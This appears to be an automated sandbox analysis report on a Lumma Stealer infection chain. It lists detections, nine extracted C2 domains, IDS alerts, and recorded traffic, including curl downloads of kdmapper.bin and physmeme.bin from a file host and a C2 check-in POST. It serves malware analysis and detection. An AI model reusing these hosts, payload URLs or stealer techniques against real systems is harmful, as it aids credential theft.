                                Source: C:\Users\user\Desktop\NKJXVMBv.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Users\user\AppData\Local\Temp\4evtisdSvL.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: physmeme.exe.3500.9.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["tearrybyiwo.shop", "surveriysiop.shop", "tiddymarktwo.shop", "tendencerangej.shop", "fossillargeiw.shop", "appleboltelwk.shop", "coursedonnyre.shop", "captainynfanw.shop", "strappystyio.shop"], "Build id": "1AsNN2--5899070203"}
                                Source: C:\Edge\msedge.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\Desktop\DqsZwsEl.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\GfhqKgmo.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\MQUzRRxE.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\NKJXVMBv.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\NhvHKDkY.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\TUtPMNAm.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\VPYFfuwr.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\WpXNITDI.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\eGTFsMJp.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\fZXNGngO.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\iacMOeMk.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\rWRTdVVu.logReversingLabs: Detection: 29%
                                Source: C:\Windows\Speech\kdmapper.exeReversingLabs: Detection: 68%
                                Source: C:\Windows\Speech\physmeme.exeReversingLabs: Detection: 60%
                                Source: 4tXm5yPtiy.exeReversingLabs: Detection: 57%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                Source: C:\Users\user\Desktop\DqsZwsEl.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\UXzpIjDH.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\TUtPMNAm.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\MQUzRRxE.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\GfhqKgmo.logJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\JlazcluE.logJoe Sandbox ML: detected
                                Source: C:\Edge\msedge.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\NKJXVMBv.logJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\EVLpKOHn.logJoe Sandbox ML: detected
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: strappystyio.shop
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: coursedonnyre.shop
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fossillargeiw.shop
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tendencerangej.shop
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: appleboltelwk.shop
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tearrybyiwo.shop
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: captainynfanw.shop
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: surveriysiop.shop
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tiddymarktwo.shop
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                                Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 1AsNN2--5899070203
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49710 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.84.213:443 -> 192.168.2.8:49711 version: TLS 1.2
                                Source: 4tXm5yPtiy.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000000.1489764684.0000000000183000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.4.dr
                                Source: Binary string: System.Windows.Forms.pdb source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B03D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb66 source: 4tXm5yPtiy.exe
                                Source: Binary string: em.pdb" source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B03D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: msedge.exe, 00000030.00000002.2113348313.000000001BEEA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.pdb source: msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb source: 4tXm5yPtiy.exe
                                Source: Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000007.00000003.1502683045.000001FB23FD4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1503257349.000001FB23F90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502895817.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502820544.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502683045.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502820544.000001FB23FD4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.pdb source: msedge.exe, 00000030.00000002.2113348313.000000001BEEA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.pdb source: msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp

                                Spreading

                                barindex
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4CBAFC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF68B4CBAFC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0015A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_0015A69B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0016C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,5_2_0016C220
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0017B348 FindFirstFileExA,5_2_0017B348
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior

                                Software Vulnerabilities

                                barindex
                                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]11_2_0040F7B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]11_2_0041407F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]11_2_0041407F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]11_2_00414031
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]11_2_0042D150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx11_2_0043F150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, eax11_2_00407170
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]11_2_00441100
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h11_2_0044A1E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h11_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], ax11_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h11_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax11_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h11_2_0044A360
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]11_2_0042D3CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]11_2_004473FA
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]11_2_00424390
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]11_2_004283A5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]11_2_004303B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]11_2_0043F479
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]11_2_0042F40F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]11_2_00443420
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah11_2_0044A4D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp11_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp11_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]11_2_0042B490
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]11_2_0044A5E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]11_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]11_2_004206E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh11_2_00443870
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]11_2_0043F8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h11_2_0043F8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]11_2_0043A880
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]11_2_0044A8B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]11_2_004468B9
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]11_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h11_2_00426910
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh11_2_004449F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]11_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, ecx11_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]11_2_004499B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebp, word ptr [edi]11_2_0043EA30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h11_2_00415ADF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h11_2_0041DAA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx11_2_0041DAA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]11_2_0040DAB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx11_2_00426B80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh11_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh11_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx11_2_00449C10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]11_2_00413CC6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]11_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]11_2_0042CCDD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]11_2_0042CCF5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]11_2_00428C90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]11_2_00404CB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]11_2_0042ED6D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]11_2_0042ED6D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]11_2_00405D10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]11_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al11_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al11_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]11_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al11_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al11_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al11_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, 0000000Bh11_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al11_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]11_2_00447E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh11_2_00447E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h11_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax11_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h11_2_0041AF50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]11_2_00410F0F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]11_2_0042DFD6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh11_2_00443FA0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.8:50097 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056036 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop) : 192.168.2.8:57162 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056042 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop) : 192.168.2.8:64156 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056040 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop) : 192.168.2.8:63708 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056058 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop) : 192.168.2.8:57903 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056056 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop) : 192.168.2.8:65196 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056054 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop) : 192.168.2.8:55617 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056052 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop) : 192.168.2.8:53502 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056046 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop) : 192.168.2.8:53256 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49711 -> 104.21.84.213:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49711 -> 104.21.84.213:443
                                Source: Malware configuration extractorURLs: tearrybyiwo.shop
                                Source: Malware configuration extractorURLs: surveriysiop.shop
                                Source: Malware configuration extractorURLs: tiddymarktwo.shop
                                Source: Malware configuration extractorURLs: tendencerangej.shop
                                Source: Malware configuration extractorURLs: fossillargeiw.shop
                                Source: Malware configuration extractorURLs: appleboltelwk.shop
                                Source: Malware configuration extractorURLs: coursedonnyre.shop
                                Source: Malware configuration extractorURLs: captainynfanw.shop
                                Source: Malware configuration extractorURLs: strappystyio.shop
                                Source: unknownDNS traffic detected: query: fossillargeiw.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: appleboltelwk.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tendencerangej.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tearrybyiwo.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: strappystyio.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tiddymarktwo.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: coursedonnyre.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: zelensky.top replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: captainynfanw.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: surveriysiop.shop replaycode: Name error (3)
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
